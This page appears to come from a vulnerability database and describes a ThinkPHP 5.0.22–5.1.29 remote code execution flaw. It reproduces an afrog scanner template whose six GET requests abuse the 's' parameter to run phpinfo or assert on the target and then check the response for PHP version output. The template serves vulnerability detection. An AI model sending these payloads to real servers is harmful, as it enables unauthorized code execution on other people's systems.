thinkphp-5024-5130-rce: ThinkPHP 5.0.22 TO 5.1.29 RCE

日期: 2025-09-01 | 影响软件: ThinkPHP | POC: 已公开

漏洞描述

A vulnerability in ThinkPHP allows remote unauthenticated attackers to cause the product to execute arbitrary code via the 's' parameter.

PoC代码[已公开]

id: thinkphp-5024-5130-rce

info:
  name: ThinkPHP 5.0.22 TO 5.1.29  RCE
  author: lark-lab
  severity: critical
  description: A vulnerability in ThinkPHP allows remote unauthenticated attackers to cause the product to execute arbitrary code via the 's' parameter.

rules:
  r0:
    request:
      method: GET
      path: "/?s=index/\\think\\Request/input&filter[]=phpinfo&data=-1"
    expression: response.status == 200 && response.body.bcontains(b'PHP Extension') && response.body.bcontains(b'PHP Version') && r'>PHP Version <\/td><td class="v">([0-9.]+)'.bmatches(response.body)
  r1:
    request:
      method: GET
      path: "/?s=index/\\think\\request/input?data[]=phpinfo()&filter=assert"
    expression: response.status == 200 && response.body.bcontains(b'PHP Extension') && response.body.bcontains(b'PHP Version') && r'>PHP Version <\/td><td class="v">([0-9.]+)'.bmatches(response.body)
  r00:
    request:
      method: GET
      path: "/?s=admin/\\think\\Request/input&filter[]=phpinfo&data=-1"
    expression: response.status == 200 && response.body.bcontains(b'PHP Extension') && response.body.bcontains(b'PHP Version') && r'>PHP Version <\/td><td class="v">([0-9.]+)'.bmatches(response.body)
  r11:
    request:
      method: GET
      path: "/?s=admin/\\think\\request/input?data[]=phpinfo()&filter=assert"
    expression: response.status == 200 && response.body.bcontains(b'PHP Extension') && response.body.bcontains(b'PHP Version') && r'>PHP Version <\/td><td class="v">([0-9.]+)'.bmatches(response.body)
  r000:
    request:
      method: GET
      path: "/?s=api/\\think\\Request/input&filter[]=phpinfo&data=-1"
    expression: response.status == 200 && response.body.bcontains(b'PHP Extension') && response.body.bcontains(b'PHP Version') && r'>PHP Version <\/td><td class="v">([0-9.]+)'.bmatches(response.body)
  r111:
    request:
      method: GET
      path: "/?s=api/\\think\\request/input?data[]=phpinfo()&filter=assert"
    expression: response.status == 200 && response.body.bcontains(b'PHP Extension') && response.body.bcontains(b'PHP Version') && r'>PHP Version <\/td><td class="v">([0-9.]+)'.bmatches(response.body)
expression: r0() || r1() || r00() || r11() || r000() || r111()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/thinkphp-5024-5130-rce.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CNVD-2024-39045: Thinkphp3 文件包含漏洞 POC

CVE-2022-33107: ThinkPHP 6.0.12 反序列化 RCE POC

CVE-2022-47945: Thinkphp Lang - Local File Inclusion POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC